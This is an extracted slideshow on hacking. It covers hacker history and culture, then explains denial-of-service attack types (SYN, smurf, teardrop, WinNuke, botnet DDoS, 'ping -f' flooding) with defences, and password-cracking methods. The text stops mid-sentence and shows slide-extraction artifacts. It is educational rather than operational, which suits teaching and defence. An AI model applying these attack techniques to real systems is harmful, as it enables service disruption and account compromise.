6552818 hacking software
TRANSCRIPT
Click To Enter The VentureClick To Enter The Venture
1
Hacking
2
Index
• Evolution Hacking
• Hacking
• Introduction To- Cyber Crime
• Special Attraction
• Viruses
• Hacking XP
• Glossary
• Prepared By
Back
3
4
Evolution of Hacking
Astonishingly, hacking did not instigate as an antisociety activity. The entire story of
hacking started with the belief that there is always more than one way to solve a problem.
People also wanted to admittance the information free of cost at any time.
Computer hacking started in the late 1950s. Before that, computers and programming
languages were not easily easily reached. Problems were solved by repeating known and
successful computing methods. To Work on computers, people needed formal problems and
predesigned solutions. Computers were allotted to professionals based on priority of their
requirements. The restricted use of computer resources reduced the chances for any
experiments with early computers.
The authorities of Massachusetts Institute of Technology (MIT) allowed people to
access their TX-0 resources without any restrictions after official hours. That was the first
time when computer users got a chance to experiment with different methods for solving
problems. In other words, that was the beginning of the hacker community. However, the
prime aim of those hackers was to experiment with new solutions without any malevolent
intent. The earlier hackers performed their activities with a strong belief that there is always a
space for enhancement. They performed their activities without any predefined structure and
time schedules.
In parallel to the computers hacking activities, a new type of hackers, phreaks, came
into existence. Phreaks first accessed telephone networks by using handheld electronic
devices. Phreaks used those devices to make modifications to pay telephones to make free
telephone calls. To try to be like payments in pay telephones, they used devices, such as red
boxes.
In the early 1980s, a new computing era started by connecting computers and
telephone networks with the help of modems. Personal computers became popular. Users
started to use modems and telephone networks to connect personal computers and mainframe
computers. The access to the computers connected to the internet opened the entire world of
computers to the hackers community. The rapid growth of the internet technologies changed
the profile of hackers.
Back5
6
Index
• What Is Hacking?
• How Do Hackers Hack?
• Classes Of Hacker
• How To Became Hacker ?
• Common Hacking Techniques
• Passwords
• Sniffers: Basics and Detection
7
Back
8
9
What is Hacking?
Hacking is an act of penetrating computer systems to gain knowledge about the
system and how it works.
What are Hackers?
Technically, a hacker is someone who is enthusiastic about computer programming
and all things relating to the technical workings of a computer. Such a definition presents the
term in a more positive light than is usually associated with the term. Most people understand
a hacker to be what is more accurately known as a 'cracker'
What are Crackers?
Crackers are people who try to gain unauthorized access to computers. This is
normally done through the use of a 'backdoor' program installed on your machine. A lot of
crackers also try to gain access to resources through the use of password cracking software,
which tries billions of passwords to find the correct one for accessing a computer.
What damage can a Hacker do?
This depends upon what backdoor program(s) are hiding on your PC. Different
programs can do different amounts of damage. However, most allow a hacker to smuggle
another program onto your PC. This means that if a hacker can't do something using the
backdoor program, he can easily put something else onto your computer that can. Hackers can
see everything you are doing, and can access any file on your disk. Hackers can write new
files, delete files, edit files, and do practically anything to a file that could be done to a file. A
hacker could install several programs on to your system without your knowledge. Such
programs could also be used to steal personal information such as passwords and credit card
information
Back
10
11
How do Hackers hack?
There are many ways in which a hacker can hack. Some are as follows –
* NetBIOS
* ICMP Ping
* FTP
* rpc.statd
* HTTP
NetBIOS
NetBIOS hacks are the worst kind, since they don't require you to have any hidden
backdoor program running on your computer. This kind of hack exploits a bug in Windows
9x. NetBIOS is meant to be used on local area networks, so machines on that network can
share information. Unfortunately, the bug is that NetBIOS can also be used across the Internet
- so a hacker can access your machine remotely.
ICMP ‘Ping’ (Internet Control Message Protocol)
ICMP is one of the main protocols that make the Internet work. It standards for
Internet Control Message Protocol. 'Ping' is one of the commands that can be sent to a
computer using ICMP. Ordinarily, a computer would respond to this ping, telling the sender
that the computer does exist. This is all pings are meant to do. Pings may seem harmless
enough, but a large number of pings can make a Denial-of-Service attack, which overloads a
computer. Also, hackers can use pings to see if a computer exists and does not have a firewall
(firewalls can block pings). If a computer responds to a ping, then the hacker could then
launch a more serious form of attack against a computer.
FTP (File Transfer Protocol)
FTP is a standard Internet protocol, standing for File Transfer Protocol. You may use it
for file downloads from some websites. If you have a web page of your own, you may use
FTP to upload it from your home computer to the web server. However, FTP can also be used
by some hackers... FTP normally requires some form of authentication for access to private
files, or for writing to files
FTP backdoor programs, such as-
* Doly Trojan
12
* Fore
* Blade Runner
simply turn your computer into an FTP server, without any authentication.
Rpc.Statd
This is a problem specific to Linux and Unix. The problem is the infamous unchecked
buffer overflow problem. This is where a fixed amount of memory is set aside for storage of
data. If data is received that is larger than this buffer, the program should truncate the data or
send back an error, or at least do something other than ignore the problem. Unfortunately, the
data overflows the memory that has been allocated to it, and the data is written into parts of
memory it shouldn't be in. This can cause crashes of various different kinds. However, a
skilled hacker could write bits of program code into memory that may be executed to perform
the hacker's evil deeds.
HTTP
HTTP stands for HyperText Transfer Protocol.. HTTP hacks can only be harmful if
you are using Microsoft web server software, such as Personal Web Server. There is a bug in
this software called an 'unchecked buffer overflow'. If a user makes a request for a file on the
web server with a very long name, part of the request gets written into parts of memory that
contain active program code. A malicious user could use this to run any program they want on
the server.
Back
13
14
Classes of Hackers Today, it is very difficult to distinguish between hackers, crackers, and script kiddies.
Therefore, hackers have been categorized into different groups based on the nature of their
tricks:
• White hats
• Black hats
• Gray hats
White HatsWhite hat hackers use their skills and knowledge for good purposes. These hackers
help to find out new security vulnerabilities and their solutions. White hats do not hack
systems with any bad intent. They like experimenting and believe that there is always a better
solution than the current one. White hat hackers always inform the vulnerabilities they
discovered to the concerned security professionals weakness of that system and help the
system administrator to implement better security measures is a White hat hacker.
Black HatsBlack hat hackers perform their activities with bad intentions. Black hats perform
illegal activities, such as destroying data, denying services to legitimate users, and defacing
Web sites. For example, a hacker who breaks into the network of a bank and steals thousands
of dollars by transferring it to other banks is a black hat. Black hat hackers share their
experiments with other crackers but not with the concerned security professionals.
Grey HatsGray hat hackers are those people who do not believe in categorizing hacking
activities as good or bad. Gray hats believe that some of the activities, which are condemned
by white hats, are harmless. Gray hat hackers might share the results of their experiments
with both security professionals and crackers.
15
The Hacker Attitude
Hackers solve problems and build things, and they believe in freedom and voluntary
mutual help. To be accepted as a hacker, you have to behave as though you have this kind of
attitude yourself. And to behave as though you have the attitude, you have to really believe
the attitude. But if you think of cultivating hacker attitudes as just a way to gain acceptance in
the culture, you'll miss the point. They're also important because becoming the kind of person
who believes these things is important, for helping you learn and keeping you motivated. As
with all creative arts, the most effective way to become a master is to imitate the mind-set of
masters -- not just intellectually but emotionally as well. (lots of these on alt.2600.hgackerz)
So, if you want to be a hacker, repeat the following things until you believe them:
1. The world is full of fascinating problems waiting to be solved.
Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort
takes motivation. Successful athletes get their motivation from a kind of physical delight in
making their bodies perform, in pushing themselves past their own physical limits. Similarly,
to be a hacker you have to get a basic thrill from solving problems, sharpening your skills,
and exercising your intelligence. If you aren't the kind of person that feels this way naturally,
you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking
energy is sapped by distractions like sex, money, and social approval. ( so I would take it all
hackers are wankers lol ).You also have to develop a kind of faith in your own learning
capacity -- a belief that even though you may not know all of what you need to solve a
problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the
next piece -- and so on, until you're done. ( I agree )
2. Nobody should ever have to solve a problem twice.
Creative brains are a valuable, limited resource. They shouldn't be wasted on re-
inventing the wheel when there are so many fascinating new problems waiting out there.
To behave like a hacker, you have to believe that the thinking time of other hackers is
precious -- so much so that it's almost a moral duty for you to share information, solve
problems and then give the solutions away just so other hackers can solve new problems
instead of having to perpetually re-address old ones. (You don't have to believe that you're
obligated to give all your creative product away, though the hackers that do that get the most
respect from other hackers. It's definitely OK to sell enough of it to keep you in food and rent
16
and computers. It's OK to use your hacking skills to support a family or even get rich, as long
as you don't forget you're a hacker while you're doing it.)
3. Boredom and drudgery are evil.
Hackers (and creative people in general) should never be bored or have to drudge at stupid
repetitive work, because when this happens it means they aren't doing what only they can do
-- solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery
are not just unpleasant but actually evil. To behave like a hacker, you have to believe this
enough to want to automate away the boring bits as much as possible, not just for yourself but
for everybody else (especially other hackers). (There is one apparent exception to this.
Hackers will sometimes do things that may seem repetitive or boring as a mind-clearing
exercise, or in order to acquire a skill or have some particular kind of experience you can't
have otherwise. But this is by choice -- nobody who can think should ever be forced into
boredom.)
4. Freedom is good.
Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop
you from solving whatever problem you're being fascinated by -- and, given the way
authoritarian minds work, will generally find some appallingly stupid reason to do so. So the
authoritarian attitude has to be fought wherever you find it, lest it smother you and other
hackers. (This isn't the same as fighting all authority. Children need to be guided and
criminals restrained. A hacker may agree to accept some kinds of authority in order to get
something he wants more than the time he spends following orders. But that's a limited,
conscious bargain; the kind of personal surrender authoritarians want is not on offer.)
Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and
information-sharing -- they only like cooperation that they control. So to behave like a hacker,
you have to develop an instinctive hostility to censorship, secrecy, and the use of force or
deception to compel responsible adults. And you have to be willing to act on that belief.
5. Attitude is no substitute for competence.
To be a hacker, you have to develop some of these attitudes. But copping an attitude
alone won't make you a hacker, any more than it will make you a champion athlete or a rock
star. Becoming a hacker will take intelligence, practice, dedication, and hard work.
17
Therefore, you have to learn to distrust attitude and respect competence of every kind.
Hackers won't let posers waste their time, but they worship competence -- especially
competence at hacking, but competence at anything is good. Competence at demanding skills
that few can master is especially good, and competence at demanding skills that involve
mental acuteness, craft, and concentration is best. If you revere competence, you'll enjoy
developing it in yourself -- the hard work and dedication will become a kind of intense play
rather than drudgery. And that's vital to becoming a hacker.
Back
18
19
How To Become A Hacker
Looking for advice on learning to crack passwords, sabotage systems, mangle
websites, write viruses, and plant Trojan horses? You came to the wrong place.
Looking for advice on how to learn the guts and bowels of a system or network, get
inside it, and become a real expert? Maybe I can help there. How you use this knowledge is
up to you. I hope you'll use it to contribute to computer science and hacking (in its good
sense), not to become a cracker or vandal.
This little essay is basically the answers to all the emails I get asking how to become a
hacker. It's not a tutorial in and of itself. It's certainly not a guaranteed success. Just give it a
try and see what happens. That said, here's where to start:
Be curious
Take things apart. Look under the hood. Dig through your system directories and see
what's in there. View the files with hex editors. Look inside your computer. Wander around
computer stores and look at what's there.
Read everything in sight
If you can afford it, buy lots of books. If you can't, spend time in libraries and online.
Borrow books from friends. Go through tutorials. Read the help files on your system. If
you're using Unix/Linux, read the man files. Check out the local college bookstores and
libraries. And as you're reading, try things (see next paragraph).
Experiment
Don't be afraid to change things, just to see what'll happen. Do this long enough, of
course, and you'll wipe out your system (see next paragraph), but that's part of becoming a
hacker. Try command options and switches you've never tried before. Look for option menus
on programs and see what they can do. In Windows, tweak your registry and see what
happens. Change settings in .INI files. In Unix, dig around in the directories where you don't
normally go. On the Macintosh, play around in the system folder.
20
Make backups
If you start mucking around with system files, registries, password files, and such, you
will eventually destroy your system. Have a backup ready. If you can afford it, have a system
you use just for experimenting, ready to reload on a moment's notice, and do your serious
work (or serious gaming!) on a different computer.
Don't limit yourself
Who says a computer or network is the only place to hack? Take apart your telephone.
Figure out your television (careful of the high voltage around the picture tube - if you fry
yourself, it's not my fault) and VCR. Figure out how closed captioning works (that was a plug
for my CaptionCentral.com Web site). Take apart your printer. Pick up the latest issues of
Nuts & Volts and Midnight Engineer (you've obviously made a good start if you're reading
Blacklisted! 411). Take apart the locks on your doors. Figure out how your radio works. Be
insatiably curious and read voraciously. There are groups you can learn from. There are whole
Web sites devoted to hacking TiVo units, for example.
Get some real tools
You can't cut a board in half with a screwdriver. Well, maybe you can, but it'll take a
long time. Dig around and find the proper tools for the operating systems you're using.
They're out there on the Web. You can get some pretty good stuff as shareware or freeware
(especially on Linux). The serious power tools often cost serious money. What kinds of tools?
Hex file editors. Snoopers that analyze system messages and network traffic. Compilers and
APIs for programming. Scripting tools. Disk editors/formatters. Disassemblers. When you get
good, write some of your own.
Learn to program
If you want to be a hacker, you're going to have to learn to program. The easiest way
to start depends on the operating system you're using. The choice of language is very
individual. It's almost a religious thing. Suggest a programming language to a beginner, and
someone will disagree. Heck, you'll probably get flamed for it in a newsgroup. In Unix, I'd
suggest getting started with Perl. Buy a copy of the camel book (Programming Perl) and the
llama book (Learning Perl). You'll have the fundamentals of programming really fast! The
21
best part is that the language itself is free. In Windows, you can get started quickly using a
visual development environment like Visual Basic or Java. No matter what the system, if you
want to get serious, you'll eventually need to learn C (or C++ or C# or some other variant).
Real hackers know more than one programming language, anyway, because no one language
is right for every task.
Learn to type
Hackers spend a lot of time at their keyboards. I type 90+ wpm (according to the
Mavis Beacon typing tutor). HackingWiz (of hackers.com and Hacker's Haven BBS fame)
says he can type 140+ wpm. The typing tutor may be boring, but it pays off.
Use real operating systems
Windows 95/98/Me is a shell on top of a 32-bit patch to a 16-bit DOS. Get some real
operating systems (Linux, Windows NT, Mac OS, OS/2...) and learn them. You can't call
yourself a linguist if you only know one language, and you certainly can't call yourself a
hacker if you only know one OS. Linux is a hacker's dream. All the source code is freely
available. Play with it, analyze it, learn it. Eventually, perhaps you can make a contribution to
Linux yourself. Who knows, you might even have a chance to write your own OS.
Talk to people
It's hard to learn in a vacuum. Take classes. Join users groups or computer clubs. Talk
to people on IRC or newsgroups or Web boards until you find people to learn with. That can
take a while. Every third message on newsgroups like alt.hack* is "teach me to hack." Sigh.
The best way to be accepted in any group is to contribute something. Share what you learn,
and others will share with you.
Do some projects
It's important to pick some projects and work until you've finished them. Learning
comes from doing, and you must follow the project through start to finish to really understand
it. Start really simple. Make an icon. Customize your system (the startup screen on Win95, or
the prompt on Unix). Make a script that performs some common operation. Write a program
that manipulates a file (try encrypting something).
22
Learn to really use the Internet
Start with the Web. Read the help for the search engines. Learn how to use Boolean
searches. Build up an awesome set of bookmarks. Then move on to other Internet resources.
Get on Usenet. Find some underground BBSs. Get on IRC. You'll find useful information in
the strangest places. Get to the point where you can answer your own questions. It's a whole
lot faster than plastering them all over various newsgroups and waiting for a serious answer.
Once you've gone through these steps, go out and contribute something. The Internet was
built by hackers. Linux was built by hackers. Usenet was built by hackers. Sendmail was built
by hackers. Be one of the hackers that builds something.
Back
23
24
Common Hacking TechniquesThe Various Hacking techniques include:
• Denial-of-service
• Trojan Horses
• Spoofing
• Sniffing
• Password Cracking
Denial-Of-ServiceDenial-Of-Service attacksattacks
Methods of attacksMethods of attacks
A "denial-of-service" attack is characterized by an explicit attempt by attackers to
prevent legitimate users of a service from using that service. Examples include:
• Attempts to "flood" a network, thereby preventing legitimate network traffic;
• Attempt to disrupt a server by sending more requests than it can possibly handle, thereby
preventing access to a service;
• Attempts to prevent a particular individual from accessing a service;
• Attempts to disrupt service to a specific system or person.
Attacks can be directed at any network device, including attacks on routing devices
and Web, electronic mail, or Domain Name System servers.
A DOS attack can be perpetrated in a number of ways. There are three basic types of
attack:
1. Consumption of computational resources, such as bandwidth, disk space, or CPU time;
2. Disruption of configuration information, such as routing information;
3. Disruption of physical network components.
In addition, the US-CERT has provided tips on the manifestations of DoS attacks:
• Unusually slow network performance (opening files or accessing web sites)
• Unavailability of a particular web site
• Inability to access any web site
• Dramatic increase in the number of spam emails received
25
SYN floods
Main article: SYN flood
A SYN flood sends a flood of TCP/SYN packets, often with a forged sender address.
Each of these packets are handled like a connection request, causing the server to spawn a
half-open connection, by sending back a TCP/SYN-ACK packet, and waiting for an
TCP/ACK packet in response from the sender address. However, because the sender address
is forged, the response never comes. These half-open connections consume resources on the
server and limit the number of connections the server is able to make, reducing the server's
ability to respond to legitimate requests until after the attack ends.
When a computer wants to make a TCP/IP connection (the most common internet
connection) to another computer, usually a server, an exchange of TCP/SYN and TCP/ACK
packets of information occur. The computer requesting the connection, usually the client's or
user's computer, sends a TCP/SYN packet which asks the server if it can connect. If the server
will allow connections, it sends a TCP/SYN-ACK packet back to the client to say "Yes, you
may connect" and reserves a space for the connection, waiting for the client to respond with a
TCP/ACK packet detailing the specifics of its connection.
In a SYN flood the address of the client is often forged so that when the server sends
the go-ahead back to the client, the message is never received because the client either doesn't
exist or wasn't expecting the packet and subsequently ignores it. This leaves the server with a
dead connection, reserved for a client that will never respond. Usually this is done to one
server many times in order to reserve all the connections for unresolved clients, which keeps
legitimate clients from making connections.
The classic example is that of a party. Only 50 people can be invited to a party, and
invitations are available on a first-come first-serve basis. Fifty letters are sent to request
invitations, but the letters all have false return addresses. The invitations are mailed to the
return addresses of the request letters. Unfortunately, all of the return addresses provided were
fake, so nobody, or at least nobody of interest, receives the invitations. Now, when someone
actually wants to come to the party (view the website), there are no invitations left because all
the invitations (connections) have been reserved for 50 supposed people who will never
actually show up.
26
LAND LAND attack
Main article: LAND attack
A LAND attack involves sending a spoofed TCP SYN packet (connection initiation)
with the target host's IP address with an open port as both source and destination. The attack
causes the targeted machine to reply to itself continuously and eventually crash.
ICMP floods
A smurf attack is one particular variant of a flooding DoS attack on the public
Internet. It relies on mis-configured network devices that allow packets to be sent to all
computer hosts on a particular network via the broadcast address of the network, rather than a
specific machine. The network then serves as a smurf amplifier. In such an attack, the
perpetrators will send large numbers of IP packets with the source address faked to appear to
be the address of the victim. To combat Denial of Service attacks on the Internet, services like
the Smurf Amplifier Registry have given network service providers the ability to identify
misconfigured networks and to take appropriate action such as filtering.
Ping flood is based on sending the victim an overwhelming number of ping packets, usually
using the "ping -f" command. It is very simple to launch, the primary requirement being
access to greater bandwidth than the victim.
UDP floods
UDP floods include "Fraggle attacks". In a fraggle attack an attacker sends a large
amount of UDP echo traffic to IP broadcast addresses, all of it having a fake source address. It
is a simple rewrite of the smurf attack code.
Teardrop attackTeardrop attack
The Teardrop attack involves sending IP fragments with overlapping oversized
payloads to the target machine. A bug in the TCP/IP fragmentation re-assembly code caused
the fragments to be improperly handled, crashing the operating system as a result. Windows
3.1x, Windows 95 and Windows NT operating systems, as well as versions of Linux prior to
2.0.32 and 2.1.63 are vulnerable to this attack.
Application level floods
On IRC, IRC floods are a common electronic warfare weapon.
Various DoS-causing exploits such as buffer overflow can cause server-running software to
get confused and fill the disk space or consume all available memory or CPU time.
27
Other kinds of DoS rely primarily on brute force, flooding the target with an overwhelming
flux of packets, oversaturating its connection bandwidth or depleting the target's system
resources. Bandwidth-saturating floods rely on the attacker having higher bandwidth
available than the victim; a common way of achieving this today is via Distributed Denial of
Service, employing a botnet. Other floods may use specific packet types or connection
requests to saturate finite resources by, for example, occupying the maximum number of open
connections or filling the victim's disk space with logs.
A "banana attack" is another particular type of DoS. It involves redirecting outgoing
messages from the client back onto the client, preventing outside access, as well as flooding
the client with the sent packets.
An attacker with access to a victim's computer may slow it until it is unusable or crash it by
using a fork bomb.
A 'Pulsing zombie' is a term referring to a special denial-of-service attack. A network
is subjected to hostile pinging by different attacker computers over an extended amount of
time. This results in a degraded quality of service and increased workload for the network's
resources. This type of attack is more difficult to detect than traditional denial-of-service
attacks due to their surreptitious nature.
Nukes
Nukes are malformed or specially crafted packets.
WinNuke is a type of nuke, exploiting the vulnerability in the NetBIOS handler in Windows
95. A string of out-of-band data is sent to TCP port 139 of the victim machine, causing it to
lock up and display a Blue Screen of Death. This attack was very popular between IRC-
dwelling script kiddies, due to easy availability of a user-friendly click-and-crash WinNuke
program.
Distributed attackDistributed attack
A distributed denial of service attack (DDoS) occurs when multiple compromised
systems flood the bandwidth or resources of a targeted system, usually a web server(s). These
systems are compromised by attackers using a variety of methods.
Malware can carry DDoS attack mechanisms; one of the more well known examples of this
was MyDoom. Its DoS mechanism was triggered on a specific date and time. This type of
DDoS involved hardcoding the target IP address prior to release of the malware and no
further interaction was necessary to launch the attack.28
A system may also be compromised with a trojan, allowing the attacker to download a zombie
agent (or the trojan may contain one). Attackers can also break into systems using automated
tools that exploit flaws in programs that listen for connections from remote hosts. This
scenario primarily concerns systems acting as servers on the web.
Stacheldraht is a classic example of a DDoS tool. It utilizes a layered structure where the
attacker uses a client program to connect to handlers, which are compromised systems that
issue commands to the zombie agents, which in turn facilitate the DDoS attack. Agents are
compromised via the handlers by the attacker, using automated routines to exploit
vulnerabilities in programs that accept remote connections running on the targeted remote
hosts. Each handler can control up to a thousand agents.
These collections of compromised systems are known as botnets. DDoS tools like
stacheldraht still use classic DoS attack methods centered around ip spoofing and
amplification like smurf and fraggle attacks (these are also known as bandwidth consumption
attacks). SYN floods (also known as resource starvation attacks) may also be used. Newer
tools can use DNS servers for DoS purposes. (see next section)
Unlike MyDooms DDoS mechanism, botnets can be turned against any ip address. Script
kiddies use them to deny the availability of well known websites to legitimate users. More
sophisticated attackers use DDoS tools for the purposes of extortion -- even against their
business rivals.
It is important to note the difference between a DDoS and DoS attack. If an attacker
mounts a smurf attack from a single host it would be classed as a DoS attack. In fact, any
attack against availability (e.g. using High-energy radio-frequency weapons to render
computer equipment inoperable) would be classed as a Denial of Service attack, albeit an
exotic one. On the other hand, if an attacker uses a thousand zombie systems to
simultaneously launch smurf attacks against a remote host, this would be classed as a DDoSDDoS
attack.attack.
Reflected attack
A distributed reflected denial of service attack involves sending forged requests of
some type to a very large number of computers that will reply to the requests. Using Internet
protocol spoofing, the source address is set to that of the targeted victim, which means all the
replies will go to (and flood) the target.
ICMP Echo Request attacks (described above) can be considered one form of
reflected attack, as the flooding host(s) send Echo Requests to the broadcast addresses of mis-
29
configured networks, thereby enticing a large number of hosts to send Echo Reply packets to
the victim. Some early DDoS programs implemented a distributed form of this attack.
Many services can be exploited to act as reflectors, some harder to block than others. DNS
amplification attacks involve a new mechanism that increased the amplification effect, using a
much larger list of DNS servers than seen earlier.
Unintentional attackUnintentional attack
This describes a situation where a website ends up denied, not due to a deliberate
attack by a single individual or group of individuals, but simply due to a sudden enormous
spike in popularity. This can happen when an extremely popular website posts a prominent
link to a second, less well-prepared site, for example, as part of a news story. The result is that
a significant proportion of the primary site's regular users — potentially hundreds of
thousands of people — click that link in the space of a few hours, having the same effect on
the target website as a DDoS attack.
News sites and link sites — sites whose primary function is to provide links to
interesting content elsewhere on the Internet — are most likely to cause this phenomenon.
The canonical example is the Slashdot effect. Sites such as Digg, Fark, Something Awful and
the webcomic Penny Arcade have their own corresponding "effects", known as "the Digg
effect", "farking", "goonrushing" and "wanging"; respectively.
Routers have also been known to create unintentional DoS attacks, as both D-Link and
Netgear routers have created NTP vandalism by flooding NTP servers without respecting the
restrictions of client types or geographical limitations.
Incidents
The first major attack involving DNS servers as reflectors occurred in January 2001.
The attack was directed at the site Register.com. This attack, which forged requests for the
MX records of AOL.com (to amplify the attack) lasted about a week before it could be traced
back to all attacking hosts and shut off. It used a list of tens of thousands of DNS servers that
was at least a year old (at the time of the attack.)
In July 2002, the Honeynet Project Reverse Challenge was issued. The binary that was
analyzed turned out to be yet another DDoS agent, which implemented several DNS related
attacks, including an optimized form of a reflection attack...
30
EffectsEffects
Denial of Service attacks can also lead to problems in the network 'branches' around
the actual computer being attacked. For example, the bandwidth of a router between the
Internet and a LAN may be consumed by a DoS, meaning not only will the intended
computer be compromised, but the entire network will also be disrupted. This is another,
more complex form of the DDoS, wherein the "zombies" can be located on the target system
itself, thus increasing network traffic on either side of the target.
If the DoS is conducted on a sufficiently large scale, entire geographical swathes of Internet
connectivity can also be compromised by incorrectly configured or flimsy network
infrastructure equipment without the attacker's knowledge or intent. For this reason, most, if
not all, ISPs ban the practice.
Common malwareCommon malware
• Stacheldraht
• Tribe Flood Network
• Trinoo
Prevention and response Prevention and response
Surviving attacksSurviving attacks
The investigative process should begin immediately after the DoS attack begins. There
will be multiple phone calls, call backs, emails, pages and faxes between the victim
organization, one's provider and others involved. It is a time consuming process, so the
process should begin immediately. It has taken some very large networks with plenty of
resources several hours to halt a DDoS.
The easiest way to survive an attack is to have planned for the attack. Having a
separate emergency block of IP addresses for critical servers with a separate route can be
invaluable. A separate route (perhaps a DSL) is not that extravagant, and it can be used for
load balancing or sharing under normal circumstances and switched to emergency mode in
the event of an attack. Filtering is generally pretty ineffective, as the route to the filter will
normally be swamped so only a trickle of traffic will survive.
31
SYN CookiesSYN Cookies
SYN cookies modify the TCP protocol handling of the server by delaying allocation
of resources until the client address has been verified. This seems to be the most powerful
defense against SYN attacks. There are solaris and Linux implementations. The linux
implementation can be turned on during runtime of the linux kernel.
Firewalls Firewalls
Firewalls have simple rules such as to allow or deny protocols, ports or IP addresses.
DoS attacks are too complex for today's firewalls. E.g. if there is an attack on port 80 (web
service), firewalls cannot prevent that attack because they cannot distinguish good traffic
from DoS attack traffic. Additionally, firewalls are too deep in the network hierarchy. Your
router may be affected even before the firewall gets the traffic.
Modern stateful firewalls like Check Point FW1 NGX & Cisco PIX have a built-in capability
to differentiate good traffic from DoS attack traffic. This capability is known as a "Defender",
as it confirms TCP connections are valid before proxying TCP packets to service networks
(including border routers).
SwitchesSwitches
Most switches have some rate-limiting and ACL capability. Some switches provide
automatic and or system-wide rate limiting, traffic shaping, delayed binding (TCP splicing),
deep packet inspection and Bogon filtering (bogus IP filtering) to detect and remediate denial
of service attacks through automatic rate filtering and WAN Link failover and balancing.
These schemes will work as long as the DoS attacks are something that can be
prevented using them. For example SYN flood can be prevented using delayed binding or
TCP splicing. Similarly content based DoS can be prevented using deep packet inspection.
Attacks originating from dark addresses or going to dark addresses can be prevented using
Bogon filtering. Automatic rate filtering can work as long as you have set rate-thresholds
correctly and granularly. Wan-link failover will work as long as both links have DoS/DDoS
prevention mechanism.
32
RoutersRouters
Similar to switches, routers have some rate-limiting and ACL capability. They too are
manually set. Most routers can be easily overwhelmed under DoS attack. If you add rules to
take flow statistics out of the router during the DoS attacks, they further slow down and
complicate the matter. Cisco IOS has features that prevents flooding, i.e. example settings
Application front end hardwareApplication front end hardware
Application front end hardware is intelligent hardware placed on the network before
traffic reaches the servers. It can be used on networks in conjunction with routers and
switches. Application front end hardware analyzes data packets as they enter the system, and
then identifies them as priority, regular, or dangerous. There are more than 25 bandwidth
management vendors. Hardware acceleration is key to bandwidth management. Look for
granularity of bandwidth management, hardware acceleration, and automation while selecting
an appliance.
IPS based preventionIPS based prevention
Intrusion-prevention systems are effective if the attacks have signatures associated
with them. However, the trend among the attacks is to have legitimate content but bad intent.
IPS systems which work on content recognition cannot block behavior based DoS attacks.
An ASIC based IPS can detect and block denial of service attacks because they have the
processing power and the granularity to analyze the attacks and act like a circuit breaker in an
automated way.
A rate-based IPS (RBIPS) must analyze traffic granularly and continuously monitor
the traffic pattern and determine if there is traffic anomaly. It must let the legitimate traffic
flow while blocking the DoS attack traffic.
Back
33
34
Passwords
Passwords to access computer systems are usually stored, typically not in cleartext
form, in a database so the system can perform password verification when users attempt to
login. To preserve confidentiality of system passwords, the password verification data is
typically generated by applying a one-way function to the password, possibly in combination
with other data. For simplicity in this discussion, when the one-way function (which may be
either an encryption function or cryptographic hash) does not incorporate a secret key, other
than the password, we will refer to the one way function employed as a hash and its output as
a hashed password.
Even though functions that create hashed passwords may be cryptographically secure,
possession of a hashed password provides a quick way to test guesses for the password by
applying the function to each guess, and comparing the result to the verification data. The
most commonly used hash functions can be computed rapidly and the attacker can test
guesses repeatedly with different guesses until one succeeds, meaning the plaintext password
has been recovered.
The term password cracking is typically limited to recovery of one or more plaintext
passwords from hashed passwords. Password cracking requires that an attacker can gain
access to a hashed password, either by reading the password verification database (e.g., via a
Trojan Horse, virus program, or social engineering) or intercepting a hashed password sent
over an open network, or has some other way to rapidly and without limit test whether a
guessed password is correct.
Without the hashed version of a password, the attacker can still attempt access to the
computer system in question with guessed passwords. However well designed systems limit
the number of failed access attempts and can alert administrators to trace the source of the
attack if that quota is exceeded. With the hashed password, the attacker can work undetected,
and if the attacker has obtained several hashed passwords, the chances for cracking at least
one is quite high.
There are also many other ways of obtaining passwords illicitly, such as social
engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing,
shoulder surfing, timing attack, acoustic cryptanalysis, identity management system attacks
and compromising host security (see password for details). However, cracking usually
designates a guessing attack.
35
Cracking may be combined with other techniques. For example, use of a hash-based
challenge-response authentication method for password verification may provide a hashed
password to an eavesdropper, who can then crack the password. A number of stronger
cryptographic protocols exist that do not expose hashed-passwords during verification over a
network, either by protecting them in transmission using a high-grade key, or by using a zero-
knowledge password proof.
Principal attack methods
Weak encryption
If a system uses a cryptographically weak function to hash or encrypt passwords, exploiting
that weakness can recover even 'well-chosen' passwords. Decryption need not be a quick
operation, and can be conducted while not connected to the target system. Any 'cracking'
technique of this kind is considered successful if it can decrypt the password in fewer
operations than would be required by a brute force attack (see below). The fewer operations
required, the "weaker" the encryption is considered to be (for equivalently well chosen
passwords). One example is the LM hash that Microsoft Windows uses by default to store
user passwords that are less than 15 characters in length. LM hash breaks the password into
two 7-character fields which are then hashed separately, allowing each half to be attacked
separately. Progress in cryptography has made available functions which are believed to
actually be "one way" hashes, such as MD5 or SHA-1. These are thought to be impossible to
invert in practice. When quality implementations of good cryptographic hash functions are
correctly used for authentication, password cracking through decryption can be considered
infeasible.
Guessing
Not surprisingly, many users choose weak passwords, usually one related to
themselves in some way. Repeated research over some 40 years has demonstrated that around
40% of user-chosen passwords are readily guessable by programs. Examples of insecure
choices include:
• blank (none)
• the word "password", "passcode", "admin" and their derivates
• the user's name or login name
• the name of their significant other or another relative
• their birthplace or date of birth 36
• a pet's name
• automobile licence plate number
• a simple modification of one of the preceding, such as suffixing a digit or
reversing the order of the letters.
• a row of letters from a standard keyboard layout (eg, the qwerty keyboard --
qwerty itself, asdf, or qwertyuiop) and so on.
Some users even neglect to change the default password that came with their account
on the computer system. And some administrators neglect to change default account
passwords provided by the operating system vendor or hardware supplier. A famous example
is the use of FieldService as a user name with Guest as the password. If not changed at system
configuration time, anyone familiar with such systems will have 'cracked' an important
password; such service accounts often have higher access privileges than a normal user
account.
The determined cracker can easily develop a computer program that accepts personal
information about the user being attacked and generates common variations for passwords
suggested by that information.
Dictionary attack
A dictionary attack also exploits the tendency of people to choose weak passwords,
and is related to the previous attack. Password cracking programs usually come equipped with
"dictionaries", or word lists, with thousands or even millions of entries of several kinds,
including:
• words in various languages
• names of people
• places
• commonly used passwords
The cracking program encrypts each word in the dictionary, and simple modifications
of each word, and checks whether any match an encrypted password. This is feasible because
the attack can be automated and, on inexpensive modern computers, several thousand
